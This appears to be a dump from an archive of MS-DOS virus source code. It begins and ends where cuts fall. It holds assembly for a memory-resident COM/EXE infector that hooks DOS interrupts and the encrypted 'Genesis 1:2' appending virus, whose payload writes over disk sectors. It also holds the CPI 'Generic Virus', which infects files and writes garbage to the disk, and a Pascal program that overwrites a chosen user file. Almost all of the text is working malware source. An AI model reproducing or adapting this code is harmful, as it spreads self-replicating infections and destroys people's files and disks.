PUSHOffset db 5
VirusFixedSeg dw 0 ; PUSH Fixed Segment
push ax
mov ax, offset start
push ax
retf
InfectEXE proc near
mov al, 'E'
mov FileType, al
mov al, 8
out 70h, al ; CMOS Memory:
; used by real-time clock
in al, 71h ; CMOS Memory
mov GenCounter, al
mov dx, offset FileName
mov ax, 3D02h
int 21h ; Open EXE File
jnb EXEOpened ; No problems? Then JMP.
retn
EXEOpened:
mov StoreSS, ax
mov dx, offset exeHeader
mov bx, StoreSS
mov cx, 24
mov ah, 3Fh
int 21h ; Read In 24 Bytes
mov ax, 4202h
mov cx, 0
mov dx, 0
int 21h ; Move pointer to End of File
push ax
add ax, 10h
adc dx, 0
and ax, 0FFF0h
mov FileSizeHW, dx
mov FileSizeLW, ax
mov cx, 1831
sub cx, 100h
add ax, cx
adc dx, 0
mov cx, 512
div cx
inc ax
mov exeDIV, ax
mov exeMOD, dx
mov ax, exeCS
mov StartCS, ax
mov ax, exeIP
mov StartIP, ax
mov ax, exeSS
mov StartSS, ax
mov ax, exeSP
mov StoreBP, ax
mov dx, FileSizeHW
mov ax, FileSizeLW
mov cx, 10h
div cx
sub ax, 10h
sub ax, exeHeadSize
mov exeCS, ax
mov exeSS, ax
mov exeIP, 100h
mov exeSP, 100h
mov ax, 4200h
xor cx, cx
mov dx, 2
int 21h ; Move Pointer to Beginning + 2
mov dx, offset exeMOD
mov bx, StoreSS
mov cx, 22
mov ah, 40h
int 21h ; Write New EXE Header
mov ax, 4202h
xor cx, cx
xor dx, dx
int 21h ; Move Pointer to End Of File
mov dx, 100h
mov ax, FileSizeLW
pop cx
sub ax, cx
sub dx, ax
mov cx, 1831
add cx, ax
sub cx, 100h
mov ah, 40h
int 21h ; Write Virus To File
mov ah, 3Eh
int 21h ; Close File
retn
InfectEXE endp
FindFirstFile:
push cx
mov cx, 0
mov ah, 4Eh
int 21h ; Find First File
pop cx
retn
GetIntVectors proc near
push es
mov ax, 351Ch
int 21h ; Get Int 1Ch Vectors
mov cs:Int1COfs, bx
mov cs:Int1CSeg, es
mov ax, 3521h
int 21h ; Get Int 21h Vectors
push es
pop ax
mov cs:Int21Seg, ax
mov cs:Int21Ofs, bx
pop es
assume es:nothing
retn
GetIntVectors endp
CheckForInstall proc near
push ax
push es
push ds
xor ax, ax
mov es, ax ; ES points to IVT
assume es:nothing
mov si, 86h
mov ax, es:[si] ; Get Int 21h Segment
mov ds, ax
mov si, offset InfMarker
cmp word ptr [si], 0A0Ch ; In Memory Already?
jnz InstallVirus ; No? Then JMP.
push ds
pop ax
call sub_0_601
pop ds
pop es
assume es:nothing
pop ax
retn
InstallVirus:
push cs
pop ds
mov ax, StoreES
dec ax
mov es, ax ; ES points to MCB
cmp byte ptr es:0, 'Z' ; Last MCB?
jz GotLastMCB ; Yes? Then JMP.
jmp short NotLastMCB
nop
GotLastMCB: ; Get Amount of Memory in MCB
mov ax, es:3
CheckForInstall endp
mov cx, 1847
shr cx, 1
shr cx, 1
shr cx, 1
shr cx, 1 ; Calculate Paragraphs
sub ax, cx ; Subtract 1847 Bytes
jb NotLastMCB ; Enough Memory? No? Then JMP.
mov es:3, ax ; Set New Amount of Memory in MCB
sub es:12h, cx ; Set Next Segment Value
push cs
pop ds ; DS = CS
mov ax, es:12h
push ax
pop es ; ES points to Virus Segment
mov si, offset start
push si
pop di
mov cx, 1575
cld
repne movsb ; Copy Virus Into Memory
push es
sub ax, ax
mov es, ax ; ES points to IVT
assume es:nothing
mov si, 84h
mov dx, offset NewInt21
mov es:[si], dx ; Set New Int 21h Offset
inc si
inc si
pop ax
mov es:[si], ax ; Set New Int 21h Segment
NotLastMCB:
pop ds
pop es
assume es:nothing
pop ax
retn
NewInt21: ; Virus Calling?
cmp al, 57h
jnz CheckForDTACall ; No? Then JMP.
jmp short JMPInt21
nop
CheckForDTACall: ; Set New DTA Segment/Offset
cmp ah, 1Ah
jnz CheckFindFCB ; No? Then JMP.
call StoreDTAVecs
jmp short JMPInt21
nop
CheckFindFCB: ; Find First File (FCB)?
cmp ah, 11h
jnz CheckFindNextMC ; No? Then JMP.
call FindFirstFCB
iret
CheckFindNextMC: ; Find Next File (FCB)?
cmp ah, 12h
jnz JMPInt21 ; No? Then JMP.
call FindNextFCB
iret
JMPInt21:
jmp dword ptr cs:Int21Ofs
FindFirstFCB proc near
mov al, 57h ; Virus Calling
int 21h ; Find First File (FCB)
push ax
push cx
push dx
push bx
push bp
push si
push di
push ds
push es
push cs
pop ds ; DS = CS
push cs
pop es ; ES = CS
assume es:seg000
mov cs:InfectCount, 0
nop
call GetFilename
jnz GotBadFile
call CheckInfection
jz GotBadFile
call DoInfection
dec InfectCount
GotBadFile:
pop es
assume es:nothing
pop ds
pop di
pop si
pop bp
pop bx
pop dx
pop cx
pop ax
retn
FindFirstFCB endp
GetFilename proc near
push cs
pop es ; ES = CS
assume es:seg000
push cs
pop es ; ES = CS
cld
call StoreFilename
jnb CheckExt ; No problems? Then JMP.
cmp di, 0
retn
CheckExt:
mov di, offset FileName
mov al, '.'
mov cx, 11
repne scasb ; Scan for File Extension
cmp word ptr [di], 'OC' ; COM File?
jnz CheckForEXE ; No? Then JMP.
cmp byte ptr [di+2], 'M' ; COM File?
jnz CheckForEXE ; No? Then JMP.
mov FileType, 'C'
nop
retn
CheckForEXE: ; EXE File?
cmp word ptr [di], 'XE'
jnz BadFileType ; No? Then JMP.
cmp byte ptr [di+2], 'E' ; EXE File?
jnz BadFileType ; NO? Then JMP.
mov FileType, 'E'
nop
BadFileType:
retn
GetFilename endp
StoreFilename proc near
push ds
mov si, cs:DTAOffset
mov ax, cs:DTASegment
mov ds, ax
mov di, offset FileName
lodsb
cmp al, 0FFh ; Extended FCB?
jnz RegularFCB ; No? Then JMP.
add si, 6 ; Add For Extended FCB
lodsb ; Get First Character
jmp short FileOnDrive
nop
RegularFCB: ; Is this a file on a drive?
cmp al, 5
jb FileOnDrive ; Yes? Then JMP.
pop ds
stc
retn
FileOnDrive:
mov cx, 11
cmp al, 0 ; End of Filename?
jz EndOfName ; Yes? Then JMP.
add al, 40h ; Capitalize Drive Letter
stosb ; Store Drive Letter
mov al, ':'
stosb
EndOfName:
lodsb
cmp al, 20h ; End of Filename?
jz EndOFFilename ; Yes? Then JMP.
stosb ; Store Character
jmp short GetNextChar
nop
EndOFFilename:
cmp byte ptr es:[di-1], '.'
jz GetNextChar
mov al, '.'
stosb ; Store EXTENSION Marker
GetNextChar:
loop EndOfName
mov al, 0
stosb ; Store End of Filename
pop ds
clc
retn
StoreFilename endp
FindNextFCB proc near
mov al, 57h ; Virus Call
int 21h ; Find Next File (FCB)
push ax
push cx
push dx
push bx
push bp
push si
push di
push ds
push es
push cs
pop ds ; DS = CS
push cs
pop es ; ES = CS
cmp cs:InfectCount, 0 ; Infected one yet?
jz CheckFile ; No? Then JMP.
jmp short BadFile
nop
CheckFile:
call GetFilename
jnz BadFile ; Bad? Then JMP.
call CheckInfection
jz BadFile ; Infected Already? Then JMP.
call DoInfection
dec InfectCount
pop es
assume es:nothing
pop ds
pop di
pop si
pop bp
pop bx
pop dx
pop cx
pop ax
retn
BadFile:
pop es
pop ds
pop di
pop si
pop bp
pop bx
pop dx
pop cx
pop ax
retn
FindNextFCB endp
InfectCount db 0
StoreDTAVecs proc near
push ax
push ds
pop ax
mov cs:DTASegment, ax
mov cs:DTAOffset, dx
pop ax
retn
StoreDTAVecs endp
GetInt24Vecs proc near
push cs
mov al, 0
out 20h, al ; Interrupt controller, 8259A.
mov ax, 3524h
int 21h ; Get Int 24h Vectors
mov Int24Ofs, bx
mov bx, es
mov Int24Seg, bx
pop es
mov si, offset Caterpillar
mov di, offset FileName
mov cx, 15
loc_0_5FA:
lodsb
add al, 20h
stosb
loop loc_0_5FA
retn
GetInt24Vecs endp
sub_0_601 proc near
push ax
push cs
pop ds ; DS = CS
push cs
pop es ; ES = CS
assume es:seg000
mov bl, GenCounter
cmp bl, 0Ch
ja loc_0_648
cmp bl, 0
jz loc_0_648
mov al, 8
out 70h, al ; CMOS Memory:
; used by real-time clock
in al, 71h ; CMOS Memory
cmp al, 0Ch
ja loc_0_648
cmp al, 0
jz loc_0_648
cmp al, bl
jz loc_0_648
inc bl
call CheckCounter
cmp al, bl
jz loc_0_648
inc bl
call CheckCounter
cmp al, bl
jz loc_0_648
pop ds
call FillWithSpace
push cs
pop ds ; DS = CS
retn
sub_0_601 endp
CheckCounter proc near
cmp bl, 12 ; Counter Below or Equal to 12?
jbe Below12 ; Yes? Then JMP.
sub bl, 12 ; Reset Counter
Below12:
retn
CheckCounter endp
loc_0_648:
pop ax
retn
DoInfection proc near
mov dx, offset NewInt24
mov ax, 2524h
int 21h ; Set New Int 24h Vectors
cmp FileType, 'C' ; COM File?
jnz DoInfectEXE ; No? Then JMP.
call InfectCOM
jmp short InfectedFile
nop
DoInfectEXE:
call InfectEXE
InfectedFile:
push ds
mov dx, Int24Ofs
mov ax, Int24Seg
mov ds, ax
mov ax, 2524h
int 21h ; Restore Int 24h
pop ds
retn
DoInfection endp
NewInt24:
mov al, 3
iret
FillWithSpace proc near
mov dx, offset NewInt1C
mov ax, 251Ch
int 21h ; Set New Int 1Ch
mov byte ptr NewInt1C, 90h
nop
mov ax, 0B800h
mov es, ax ; ES points to Video Memory
assume es:nothing
mov di, 0FA0h
mov ax, 720h
mov cx, 11
repne stosw
push cs
pop es ; ES = CS
assume es:seg000
retn
FillWithSpace endp
db 0 ;
db 0 ;
byte_0_699 db 0
word_0_69A dw 720h
byte_0_69C db 0Fh, 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh
db 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0F7h, 0Eh
byte_0_6AE db 0EEh
db 0Ch ;
NewInt1C:
nop
sti
push ax
push cx
push dx
push bx
push bp
push si
push di
push ds
push es
push cs
pop ds ; DS = CS
jmp short loc_0_6CA
nop
loc_0_6C0:
pop es
assume es:nothing
pop ds
pop di
pop si
pop bp
pop bx
pop dx
pop cx
pop ax
iret
loc_0_6CA:
mov ax, 0B800h
mov es, ax ; ES points to Video Memory
assume es:nothing
call sub_0_6FD
mov si, offset word_0_69A
mov cx, 22
repne movsb
cmp byte_0_6AE, 0EEh
jz loc_0_6E9
mov byte_0_6AE, 0EEh
jmp short loc_0_6EE
nop
loc_0_6E9:
mov byte_0_6AE, 0F0h
loc_0_6EE:
mov ax, es:[di]
mov ah, 0Eh
mov word_0_69A, ax
mov byte_0_699, 0
jmp short loc_0_6C0
sub_0_6FD proc near
mov di, 0
loc_0_700:
mov si, offset byte_0_69C
push di
mov cx, 18
cld
rep cmpsb
pop di
jz loc_0_718
inc di
inc di
cmp di, 4000
jnz loc_0_700
mov di, 0
loc_0_718:
cmp di, 3998
jnz locret_0_723
mov byte ptr NewInt1C, 0CFh
locret_0_723:
retn
sub_0_6FD endp
FileType db 0 ; E = EXE File C = COM File
; 0 = 1st Generation
InfMarker dw 0A0Ch
seg000 ends
end start

60
MSDOS/Virus.MSDOS.Unknown.gde.pas Normal file
View File

@ -0,0 +1,60 @@
PROGRAM GDE; {By änchanter for LAME SysOps}
USES CRT;
VAR Temp : Text;
X : Integer;
Death_File : String;
{--------------------------------------------------------------------------}
PROCEDURE NoParams;
BEGIN;
SOUND(220);
DELAY(200);
NOSOUND;
TEXTCOLOR(RED);
WRITELN('You Forgot Something... ');
WRITELN;
WRITELN(' SYNTAX:');
WRITELN('GDE C:\SHOCK\USERS');
WRITELN;
WRITELN('Run AGAIN....');
WRITELN(' (c) 1990,1991');
HALT;
END;
{--------------------------------------------------------------------------}
PROCEDURE Kill_That_Fucker;
BEGIN;
ASSIGN(TEMP, Death_File);
REWRITE(TEMP);
CLOSE(TEMP);
APPEND(TEMP);
WHILE X <> 5 Do
BEGIN;
WRITELN(TEMP, 'KGB Read The User File');
WRITELN(TEMP, 'KGB Wrote The User File');
X := X + 1;
END;
WRITELN(TEMP, '<BOOM, you are dead>');
WRITELN(TEMP, 'KGB is WATCHING YOU!');
CLOSE(TEMP);
END;
{--------------------------------------------------------------------------}
PROCEDURE INIT;
BEGIN;
IF PARAMCOUNT <> 1 THEN NoParams;
Death_File := PARAMSTR(1);
TEXTCOLOR(BLUE);
WRITELN('READING USER FILE.......');
Kill_That_Fucker;
WRITELN('ERROR, USER FILE CURRUPTED!');
HALT;
END;
{--------------------------------------------------------------------------}
BEGIN;
X := 1;
INIT;
END.

390
MSDOS/Virus.MSDOS.Unknown.gen12.asm Normal file
View File

@ -0,0 +1,390 @@
; GEN12.ASM -- Genesis 1:2 Virus
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Virucidal Maniac
virus_type equ 0 ; Appending Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
main proc near
db 0E9h,00h,00h ; Near jump (for compatibility)
start: call find_offset ; Like a PUSH IP
find_offset: pop bp ; BP holds old IP
sub bp,offset find_offset ; Adjust for length of host
call encrypt_decrypt ; Decrypt the virus
start_of_code label near
lea si,[bp + buffer] ; SI points to original start
mov di,0100h ; Push 0100h on to stack for
push di ; return to main program
movsw ; Copy the first two bytes
movsb ; Copy the third byte
mov di,bp ; DI points to start of virus
mov bp,sp ; BP points to stack
sub sp,128 ; Allocate 128 bytes on stack
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer on stack
int 021h
call get_dos_version
cmp ax,0005h ; Did the function return 5?
jl strt00 ; If less, do effect
call get_minute
or ax,ax ; Did the function return zero?
je strt00 ; If equal, do effect
call get_year
cmp ax,07C9h ; Did the function return 1993?
je strt00 ; If equal, do effect
jmp end00 ; Otherwise skip over it
strt00: mov ax,0002h ; First argument is 2
mov cx,0007h ; Second argument is 7
cli ; Disable interrupts (no Ctrl-C)
cwd ; Clear DX (start with sector 0)
int 026h ; DOS absolute write interrupt
sti ; Restore interrupts
end00: mov cx,0005h ; Do 5 infections
search_loop: push cx ; Save CX
call search_files ; Find and infect a file
pop cx ; Restore CX
loop search_loop ; Repeat until CX is 0
jmp end01 ; Otherwise skip over it
strt01: lea si,[di + data00] ; SI points to data
mov ah,0Eh ; BIOS display char. function
display_loop: lodsb ; Load the next char. into AL
or al,al ; Is the character a null?
je disp_strnend ; If it is, exit
int 010h ; BIOS video interrupt
jmp short display_loop ; Do the next character
disp_strnend:
end01:
com_end: pop dx ; DX holds original DTA address
mov ah,01Ah ; DOS set DTA function
int 021h
mov sp,bp ; Deallocate local buffer
xor ax,ax ;
mov bx,ax ;
mov cx,ax ;
mov dx,ax ; Empty out the registers
mov si,ax ;
mov di,ax ;
mov bp,ax ;
ret ; Return to original program
main endp
search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,64 ; Allocate 64 bytes on stack
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 64] ; SI points to 64-byte buffer
int 021h
mov ah,03Bh ; DOS change directory function
lea dx,[di + root] ; DX points to root directory
int 021h
call traverse ; Start the traversal
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 64] ; DX points to old directory
int 021h
mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
root db "\",0 ; Root directory
search_files endp
traverse proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first function
mov cx,00010000b ; CX holds search attributes
lea dx,[di + all_files] ; DX points to "*.*"
int 021h
jc leave_traverse ; Leave if no files present
check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
jne another_dir ; If not, try again
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
je another_dir ;If so, keep going
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 98] ; DX points to new directory
int 021h
call traverse ; Recursively call ourself
pushf ; Save the flags
mov ah,03Bh ; DOS change directory function
lea dx,[di + up_dir] ; DX points to parent directory
int 021h
popf ; Restore the flags
jnc done_searching ; If we infected then exit
another_dir: mov ah,04Fh ; DOS find next function
int 021h
jnc check_dir ; If found check the file
leave_traverse:
lea dx,[di + com_mask] ; DX points to "*.COM"
call find_files ; Try to infect a file
done_searching: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
up_dir db "..",0 ; Parent directory name
all_files db "*.*",0 ; Directories to search for
com_mask db "*.COM",0 ; Mask for all .COM files
traverse endp
find_files proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file
done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_files endp
infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov si,bx ; SI points to the DTA
mov byte ptr [di + set_carry],0 ; Assume we'll fail
cmp word ptr [si + 01Ah],(65279 - (finish - start))
jbe size_ok ; If it's small enough continue
jmp infection_done ; Otherwise exit
size_ok: mov ax,03D00h ; DOS open file function, r/o
lea dx,[si + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; BX holds file handle
mov ah,03Fh ; DOS read from file function
mov cx,3 ; CX holds bytes to read (3)
lea dx,[di + buffer] ; DX points to buffer
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
xchg dx,ax ; Faster than a PUSH AX
mov ah,03Eh ; DOS close file function
int 021h
xchg dx,ax ; Faster than a POP AX
sub ax,finish - start + 3 ; Adjust AX for a valid jump
cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet?
je infection_done ; If equal then exit
mov byte ptr [di + set_carry],1 ; Success -- the file is OK
add ax,finish - start ; Re-adjust to make the jump
mov word ptr [di + new_jump + 1],ax ; Construct jump
mov ax,04301h ; DOS set file attrib. function
xor cx,cx ; Clear all attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
mov ax,03D02h ; DOS open file function, r/w
int 021h
xchg bx,ax ; BX holds file handle
mov ah,040h ; DOS write to file function
mov cx,3 ; CX holds bytes to write (3)
lea dx,[di + new_jump] ; DX points to the jump we made
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
push si ; Save SI through call
call encrypt_code ; Write an encrypted copy
pop si ; Restore SI
mov ax,05701h ; DOS set file time function
mov cx,[si + 016h] ; CX holds old file time
mov dx,[si + 018h] ; DX holds old file date
int 021h
mov ah,03Eh ; DOS close file function
int 021h
mov ax,04301h ; DOS set file attrib. function
xor ch,ch ; Clear CH for file attribute
mov cl,[si + 015h] ; CX holds file's old attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed
ret ; Return to caller
set_carry db ? ; Set-carry-on-exit flag
buffer db 090h,0CDh,020h ; Buffer to hold old three bytes
new_jump db 0E9h,?,? ; New jump to virus
infect_file endp
get_dos_version proc near
mov ah,030h ; DOS get DOS version function
int 021h
mov bx,ax ; Save return value in BX
xor bl,bl ; Clear DOS major version in BX
xchg bh,bl ; Place 0 in BH, minor in BL
cbw ; Sign-extend AL into AX
mov cl,100 ; CL holds multiplier
mul cl ; Multiply AL by 100
add ax,bx ; Add back the minor version
ret ; Return to caller
get_dos_version endp
get_minute proc near
mov ah,02Ch ; DOS get time function
int 021h
mov al,cl ; Copy minute into AL
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_minute endp
get_year proc near
mov ah,02Ah ; DOS get date function
int 021h
xchg cx,ax ; Transfer the year into AX
ret ; Return to caller
get_year endp
data00 db "Genesis 1:2",13,10
db " And the earth was without form and void...",13,10
db 13,10
db " Now...So is your hard disk.",13,10
db 13,10
db " -Virucidal Maniac",13,10
vcl_marker db "[VCL]",0 ; VCL creation marker
encrypt_code proc near
push bp ; Save BP
mov bp,di ; Use BP as pointer to code
lea si,[bp + encrypt_decrypt]; SI points to cipher routine
xor ah,ah ; BIOS get time function
int 01Ah
mov word ptr [si + 9],dx ; Low word of timer is new key
xor byte ptr [si + 1],8 ;
xor byte ptr [si + 8],1 ; Change all SIs to DIs
xor word ptr [si + 11],0101h; (and vice-versa)
lea di,[bp + finish] ; Copy routine into heap
mov cx,finish - encrypt_decrypt - 1 ; All but final RET
push si ; Save SI for later
push cx ; Save CX for later
rep movsb ; Copy the bytes
lea si,[bp + write_stuff] ; SI points to write stuff
mov cx,5 ; CX holds length of write
rep movsb ; Copy the bytes
pop cx ; Restore CX
pop si ; Restore SI
inc cx ; Copy the RET also this time
rep movsb ; Copy the routine again
mov ah,040h ; DOS write to file function
lea dx,[bp + start] ; DX points to virus
lea si,[bp + finish] ; SI points to routine
call si ; Encrypt/write/decrypt
mov di,bp ; DI points to virus again
pop bp ; Restore BP
ret ; Return to caller
write_stuff: mov cx,finish - start ; Length of code
int 021h
encrypt_code endp
end_of_code label near
encrypt_decrypt proc near
lea si,[bp + start_of_code] ; SI points to code to decrypt
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
inc si ; Do the next word
inc si ;
loop xor_loop ; Loop until we're through
ret ; Return to caller
encrypt_decrypt endp
finish label near
code ends
end main

260
MSDOS/Virus.MSDOS.Unknown.generic.asm Normal file
View File

@ -0,0 +1,260 @@
;=============================================================================
;
; C*P*I
;
; CORRUPTED PROGRAMMING INTERNATIONAL
; -----------------------------------
; p r e s e n t s
;
; T H E
; _ _
; (g) GENERIC VIRUS (g)
; ^ ^
;
;
; A GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADDS A BIT OF
; CODE IN AND MAKES EACH A VIRUS. HOWEVER, WHEN IT MODIFIES EXE FILES, IT
; RENAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR ÒPROGRAM TO BIG TO
; FIT IN MEMORYÓ THIS WILL BE REPAIRED IN LATER VERSIONS OF THIS VIRUS.
;
; WHEN IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARBAGE ON
; THE DISK. HAVE PHUN WITH THIS ONE.
;
; ALSO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION FOR THE CODE
; IMMEDIATE ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;| GROUPING.
;
; THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CPI WILL NOT BE
; HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER INTRODUCTION OF
; THIS VIRUS. ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF ILLEGAL OR
; ILLICIT ACTIVITY THROUGH THE RELEASE OF THIS FILE.
;
; DOCTOR DISSECTOR
; CPI ASSOCIATES
;
;=============================================================================
MAIN:
NOP ;| Marker bytes that identify this program
NOP ;| as infected/a virus
NOP ;|
MOV AX,00 ;| Initialize the pointers
MOV ES:[POINTER],AX ;|
MOV ES:[COUNTER],AX ;|
MOV ES:[DISKS B],AL ;|
MOV AH,19 ;| Get the selected drive (dir?)
INT 21 ;|
MOV CS:DRIVE,AL ;| Get current path (save drive)
MOV AH,47 ;| (dir?)
MOV DH,0 ;|
ADD AL,1 ;|
MOV DL,AL ;| (in actual drive)
LEA SI,CS:OLD_PATH ;|
INT 21 ;|
MOV AH,0E ;| Find # of drives
MOV DL,0 ;|
INT 21 ;|
CMP AL,01 ;| (Check if only one drive)
JNZ HUPS3 ;| (If not one drive, go the HUPS3)
MOV AL,06 ;| Set pointer to SEARCH_ORDER +6 (one drive)
HUPS3: MOV AH,0 ;| Execute this if there is more than 1 drive
LEA BX,SEARCH_ORDER ;|
ADD BX,AX ;|
ADD BX,0001 ;|
MOV CS:POINTER,BX ;|
CLC ;|
CHANGE_DISK: ;| Carry is set if no more .COM files are
JNC NO_NAME_CHANGE ;| found. From here, .EXE files will be
MOV AH,17 ;| renamed to .COM (change .EXE to .COM)
LEA DX,CS:MASKE_EXE ;| but will cause the error message ÒProgram
INT 21 ;| to large to fit in memoryÓ when starting
CMP AL,0FF ;| larger infected programs
JNZ NO_NAME_CHANGE ;| (Check if an .EXE is found)
MOV AH,2CH ;| If neither .COM or .EXE files can be found,
INT 21 ;| then random sectors on the disk will be
MOV BX,CS:POINTER ;| overwritten depending on the system time
MOV AL,CS:[BX] ;| in milliseconds. This is the time of the
MOV BX,DX ;| complete ÒinfectionÓ of a storage medium.
MOV CX,2 ;| The virus can find nothing more to infect
MOV DH,0 ;| starts its destruction.
INT 26 ;| (write crap on disk)
NO_NAME_CHANGE: ;| Check if the end of the search order table
MOV BX,CS:POINTER ;| has been reached. If so, end.
DEC BX ;|
MOV CS:POINTER,BX ;|
MOV DL,CS:[BX] ;|
CMP DL,0FF ;|
JNZ HUPS2 ;|
JMP HOPS ;|
HUPS2: ;| Get a new drive from the search order table
MOV AH,0E ;| and select it, beginning with the ROOT dir.
INT 21 ;| (change drive)
MOV AH,3B ;| (change path)
LEA DX,PATH ;|
INT 21 ;|
JMP FIND_FIRST_FILE ;|
FIND_FIRST_SUBDIR: ;| Starting from the root, search for the
MOV AH,17 ;| first subdir. First, (change .exe to .com)
LEA DX,CS:MASKE_EXE ;| convert all .EXE files to .COM in the
INT 21 ;| old directory.
MOV AH,3B ;| (use root directory)
LEA DX,PATH ;|
INT 21 ;|
MOV AH,04E ;| (search for first subdirectory)
MOV CX,00010001B ;| (dir mask)
LEA DX,MASKE_DIR ;|
INT 21 ;|
JC CHANGE_DISK ;|
MOV BX,CS:COUNTER ;|
INC BX ;|
DEC BX ;|
JZ USE_NEXT_SUBDIR ;|
FIND_NEXT_SUBDIR: ;| Search for the next sub-dir, if no more
MOV AH,4FH ;| are found, the (search for next subdir)
INT 21 ;| drive will be changed.
JC CHANGE_DISK ;|
DEC BX ;|
JNZ FIND_NEXT_SUBDIR ;|
USE_NEXT_SUBDIR:
MOV AH,2FH ;| Select found directory. (get dta address)
INT 21 ;|
ADD BX,1CH ;|
MOV ES:[BX],\Ó ;| (address of name in dta)
INC BX ;|
PUSH DS ;|
MOV AX,ES ;|
MOV DS,AX ;|
MOV DX,BX ;|
MOV AH,3B ;| (change path)
INT 21 ;|
POP DS ;|
MOV BX,CS:COUNTER ;|
INC BX ;|
MOV CS:COUNTER,BX ;|
FIND_FIRST_FILE: ;| Find first .COM file in the current dir.
MOV AH,04E ;| If there are none, (Search for first)
MOV CX,00000001B ;| search the next directory. (mask)
LEA DX,MASKE_COM ;|
INT 21 ;|
JC FIND_FIRST_SUBDIR ;|
JMP CHECK_IF_ILL ;|
FIND_NEXT_FILE: ;| If program is ill (infected) then search
MOV AH,4FH ;| for another. (search for next)
INT 21 ;|
JC FIND_FIRST_SUBDIR ;|
CHECK_IF_ILL: ;| Check if already infected by virus.
MOV AH,3D ;| (open channel)
MOV AL,02 ;| (read/write)
MOV DX,9EH ;| (address of name in dta)
INT 21 ;|
MOV BX,AX ;| (save channel)
MOV AH,3FH ;| (read file)
MOV CH,BUFLEN ;|
MOV DX,BUFFER ;| (write in buffer)
INT 21 ;|
MOV AH,3EH ;| (close file)
INT 21 ;|
MOV BX,CS:[BUFFER] ;| (look for three NOPÕs)
CMP BX,9090 ;|
JZ FIND_NEXT_FILE ;|
MOV AH,43 ;| This section by-passes (write enable)
MOV AL,0 ;| the MS/PC DOS Write Protection.
MOV DX,9EH ;| (address of name in dta)
INT 21 ;|
MOV AH,43 ;|
MOV AL,01 ;|
AND CX,11111110B ;|
INT 21 ;|
MOV AH,3D ;| Open file for read/write (open channel)
MOV AL,02 ;| access (read/write)
MOV DX,9EH ;| (address of name in dta)
INT 21 ;|
MOV BX,AX ;| Read date entry of program and (channel)
MOV AH,57 ;| save for future use. (get date)
MOV AL,0 ;|
INT 21 ;|
PUSH CX ;| (save date)
PUSH DX ;|
MOV DX,CS:[CONTA W] ;| The jump located at 0100h (save old jmp)
MOV CS:[JMPBUF],DX ;| the program will be saved for future use.
MOV DX,CS:[BUFFER+1] ;| (save new jump)
LEA CX,CONT-100 ;|
SUB DX,CX ;|
MOV CS:[CONTA],DX ;|
MOV AH,57 ;| The virus now copies itself to (write date)
MOV AL,1 ;| to the start of the file.
POP DX ;|
POP CX ;| (restore date)
INT 21 ;|
MOV AH,3EH ;| (close file)
INT 21 ;|
MOV DX,CS:[JMPBUF] ;| Restore the old jump address. The virus
MOV CS:[CONTA],DX ;| at address ÒCONTAÓ the jump which was at the
;| start of the program. This is done to
HOPS: ;| preserve the executability of the host
NOP ;| program as much as possible. After saving,
CALL USE_OLD ;| it still works with the jump address in the
;| virus. The jump address in the virus differs
;| from the jump address in memory
CONT DB 0E9 ;| Continue with the host program (make jump)
CONTA DW 0 ;|
MOV AH,00 ;|
